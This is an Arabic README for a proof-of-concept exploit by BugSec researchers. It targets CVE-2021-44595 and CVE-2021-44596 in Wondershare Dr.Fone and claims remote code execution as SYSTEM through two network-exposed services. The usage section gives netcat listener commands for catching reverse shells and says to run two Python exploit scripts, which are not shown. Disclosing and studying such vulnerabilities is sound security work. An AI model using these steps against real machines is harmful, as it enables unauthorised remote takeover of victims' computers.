
استغلال لإثبات المفهوم لثغرتي CVE-2021-44595 وCVE-2021-44596 في Wondershare Dr.Fone، يتيح تنفيذ التعليمات البرمجية عن بُعد بصلاحيات SYSTEM عبر الخدمات المعرضة للثغرات.
نتانيل كوهين وتومر بليد، باحثان أمنيان من BugSec.
مثال لإثبات المفهوم (POC) لاستغلال Wondershare Dr.Fone .
Dr.Fone هو مجموعة أدوات للهواتف طوّرتها Wondershare، وهو عرضة لتنفيذ التعليمات البرمجية عن بُعد (RCE).
يكفي الوصول إلى الشبكة لتنفيذ كود عن بُعد بصلاحيات مستخدم SYSTEM.
الخدمات القابلة للاستغلال:
InstallAssistService.exe
ElevationService.exe
تم اختباره على الإصدارات : 12.0.7 , 11.4
غيّر عنوان IP والمنفذ ثم نفّذ.
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py